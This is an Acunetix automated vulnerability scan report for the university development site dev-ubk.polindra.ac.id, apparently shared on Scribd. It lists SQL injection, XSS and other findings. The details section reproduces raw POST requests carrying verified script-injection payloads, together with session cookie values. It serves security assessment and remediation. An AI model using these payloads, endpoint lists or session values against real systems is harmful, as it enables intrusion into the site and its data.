0% found this document useful (0 votes)

44 views99 pages

Developer HTTP Dev Ubk Polindra Ac Id Dashboard

The security audit report summarizes a scan of the dev-ubk.polindra.ac.id website that found 67 alerts, including 44 high severity issues. The most critical vulnerabilities were cross-site scripting and SQL injection vulnerabilities found on several pages that could allow attackers to compromise the backend database or deface the website. Other issues included exposed error messages, development files, and unencrypted connections.

Uploaded by

Winda Jayatri

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

44 views99 pages

Developer HTTP Dev Ubk Polindra Ac Id Dashboard

Uploaded by

Winda Jayatri

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 99

Developer

Report
Acunetix Security Audit

2023-07-23

Generated by Acunetix

1
Scan of dev-ubk.polindra.ac.id
Scan details
Scan information
Start time 2023-07-23T13:11:31.503970+07:00
Start url http://dev-ubk.polindra.ac.id/dashboard
Host dev-ubk.polindra.ac.id
Scan time 237 minutes, 51 seconds
Profile Full Scan
Server information Apache
Responsive True
Server OS Unknown
Application build 14.7.220401065

Threat level

Acunetix Threat Level 3

One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.

Alerts distribution

Total alerts found 67

High 44
Medium 6
Low 4
Informational 13

2
Alerts summary

SQL injection

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
Base Score: 10.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None

3
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-89
Affected items Variation
/dosen/data 5
/hasilujian/data 6
/jurusan/data 1
/kelas/data 2
/mahasiswa/data 6

Application error messages

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-209
Affected items Variation
Web Server 1

4
Development configuration files

Classification
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
Base Score: 3.1
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-538
Affected items Variation
Web Server 1

Unencrypted connection

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Base Score: 5.4
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: Low
Availability Impact: None

5
Base Score: 5.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-319
Affected items Variation
Web Server 1

User credentials are sent in clear text

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
Base Score: 4.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-523
Affected items Variation
Web Server 1

Vulnerable JavaScript libraries

Classification

6
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Base Score: 6.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: Low
Availability Impact: None
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-937
Affected items Variation
Web Server 2

Clickjacking: X-Frame-Options header

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Base Score: 5.8
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Changed
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
Base Score: 4.3
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined

7
CWE CWE-1021
Affected items Variation
Web Server 1

Composer installed.json publicly accessible

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Base Score: 5.8
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Changed
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-200
Affected items Variation
Web Server 1

Cookies with missing, inconsistent or contradictory properties

8
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-284
Affected items Variation
Web Server 1

Cookies without HttpOnly flag set

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-1004
Affected items Variation
Web Server 1

Content Security Policy (CSP) not implemented

Classification

9
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Changed
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-1021
Affected items Variation
Web Server 1

Content type is not specified

10
CWE CWE-16
Affected items Variation
Web Server 1

File uploads

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

No HTTP Redirection

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Changed
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None

11
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

Outdated JavaScript libraries

Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Changed
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: High
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-937
Affected items Variation
Web Server 7

Possible server path disclosure (Unix)

Classification

12
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-200
Affected items Variation
Web Server 1

Reverse proxy detected

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined

13
CWE CWE-16
Affected items Variation
Web Server 1

14
Alerts details

Cross site scripting

Severity High
Reported by module /Scripts/PerScheme/XSS.script

Description

Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into
a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user
input within the output it generates.

Impact

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.

Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.

Recommendation

Apply context-dependent encoding and/or validation to user input rendered on a page

References

Cross-site Scripting (XSS) Attack - Acunetix (https://www.acunetix.com/websitesecurity/cross-site-scripting/)

Types of XSS - Acunetix (https://www.acunetix.com/websitesecurity/xss/)
XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Excess XSS, a comprehensive tutorial on cross-site scripting (https://excess-xss.com/)
Cross site scripting (https://en.wikipedia.org/wiki/Cross-site_scripting )

Affected items

/dosen/data
Verified vulnerability
Details
URL encoded POST input columns[1][data] was set to nip'"()&%<acx><ScRiPt >7cbq(9204)</ScRiPt>
Request headers

15
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1334

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip'"()%26%25<acx><ScRiPt%20>7cbq(9204)</ScRiPt>&columns[1][name]=&columns[1]
[orderable]=true&columns[1][search][regex]=false&columns[1][search][value]=&columns[1]
[searchable]=true&columns[2][data]=nama_dosen&columns[2][name]=&columns[2]
[orderable]=true&columns[2][search][regex]=false&columns[2][search][value]=&columns[2]
[searchable]=true&columns[3][data]=email&columns[3][name]=&columns[3]
[orderable]=true&columns[3][search][regex]=false&columns[3][search][value]=&columns[3]
[searchable]=true&columns[4][data]=nama_matkul&columns[4][name]=&columns[4]
[orderable]=true&columns[4][search][regex]=false&columns[4][search][value]=&columns[4]
[searchable]=true&columns[5][data][ada]=ada&columns[5][data]
[id_dosen]=id_dosen&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=false&columns[6]
[data]=id_dosen&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/dosen/data
Verified vulnerability
Details
URL encoded POST input columns[2][data] was set to nama_dosen'"()&%<acx><ScRiPt >7cbq(9205)</ScRiPt>
Request headers

16
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1334

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_dosen'"()%26%25<acx><ScRiPt%20>7cbq(9205)</ScRiPt>&columns[2]
[name]=&columns[2][orderable]=true&columns[2][search][regex]=false&columns[2][search]
[value]=&columns[2][searchable]=true&columns[3][data]=email&columns[3][name]=&columns[3]
[orderable]=true&columns[3][search][regex]=false&columns[3][search][value]=&columns[3]
[searchable]=true&columns[4][data]=nama_matkul&columns[4][name]=&columns[4]
[orderable]=true&columns[4][search][regex]=false&columns[4][search][value]=&columns[4]
[searchable]=true&columns[5][data][ada]=ada&columns[5][data]
[id_dosen]=id_dosen&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=false&columns[6]
[data]=id_dosen&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/dosen/data
Verified vulnerability
Details
URL encoded POST input columns[3][data] was set to email'"()&%<acx><ScRiPt >7cbq(9087)</ScRiPt>
Request headers

17
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1334

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_dosen&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email'"()%26%25<acx><ScRiPt%20>7cbq(9087)</ScRiPt>&columns[3][name]=&columns[3]
[orderable]=true&columns[3][search][regex]=false&columns[3][search][value]=&columns[3]
[searchable]=true&columns[4][data]=nama_matkul&columns[4][name]=&columns[4]
[orderable]=true&columns[4][search][regex]=false&columns[4][search][value]=&columns[4]
[searchable]=true&columns[5][data][ada]=ada&columns[5][data]
[id_dosen]=id_dosen&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=false&columns[6]
[data]=id_dosen&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/dosen/data
Verified vulnerability
Details
URL encoded POST input columns[4][data] was set to nama_matkul'"()&%<acx><ScRiPt >7cbq(9772)</ScRiPt>
Request headers

18
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1334

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_dosen&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_matkul'"()%26%25<acx><ScRiPt%20>7cbq(9772)</ScRiPt>&columns[4]
[name]=&columns[4][orderable]=true&columns[4][search][regex]=false&columns[4][search]
[value]=&columns[4][searchable]=true&columns[5][data][ada]=ada&columns[5][data]
[id_dosen]=id_dosen&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=false&columns[6]
[data]=id_dosen&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/dosen/data
Verified vulnerability
Details
URL encoded POST input columns[6][data] was set to id_dosen'"()&%<acx><ScRiPt >7cbq(9707)</ScRiPt>
Request headers

19
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1334

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_dosen&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_matkul&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5][data]
[ada]=ada&columns[5][data][id_dosen]=id_dosen&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=false&columns[6][data]=id_dosen'"()%26%25<acx><ScRiPt%20>7cbq(9707)
</ScRiPt>&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Verified vulnerability
Details
URL encoded POST input columns[1][data] was set to nama_ujian'"()&%<acx><ScRiPt >PFmA(9288)</ScRiPt>
Request headers

20
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1466

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian'"()%26%25<acx><ScRiPt%20>PFmA(9288)</ScRiPt>&columns[1]
[name]=&columns[1][orderable]=true&columns[1][search][regex]=false&columns[1][search]
[value]=&columns[1][searchable]=true&columns[2][data]=nama_matkul&columns[2]
[name]=&columns[2][orderable]=true&columns[2][search][regex]=false&columns[2][search]
[value]=&columns[2][searchable]=true&columns[3][data]=nama_dosen&columns[3]
[name]=&columns[3][orderable]=true&columns[3][search][regex]=false&columns[3][search]
[value]=&columns[3][searchable]=true&columns[4][data]=jumlah_soal&columns[4]
[name]=&columns[4][orderable]=true&columns[4][search][regex]=false&columns[4][search]
[value]=&columns[4][searchable]=true&columns[5][data]=waktu&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data]=tgl_mulai&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&columns[7][data]=id_ujian&columns[7][name]=&columns[7]
[orderable]=false&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Verified vulnerability
Details
URL encoded POST input columns[2][data] was set to nama_matkul'"()&%<acx><ScRiPt >PFmA(9334)</ScRiPt>
Request headers

21
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1466

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul'"()%26%25<acx><ScRiPt%20>PFmA(9334)</ScRiPt>&columns[2]
[name]=&columns[2][orderable]=true&columns[2][search][regex]=false&columns[2][search]
[value]=&columns[2][searchable]=true&columns[3][data]=nama_dosen&columns[3]
[name]=&columns[3][orderable]=true&columns[3][search][regex]=false&columns[3][search]
[value]=&columns[3][searchable]=true&columns[4][data]=jumlah_soal&columns[4]
[name]=&columns[4][orderable]=true&columns[4][search][regex]=false&columns[4][search]
[value]=&columns[4][searchable]=true&columns[5][data]=waktu&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data]=tgl_mulai&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&columns[7][data]=id_ujian&columns[7][name]=&columns[7]
[orderable]=false&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Verified vulnerability
Details
URL encoded POST input columns[3][data] was set to nama_dosen'"()&%<acx><ScRiPt >PFmA(9311)</ScRiPt>
Request headers

22
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1466

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

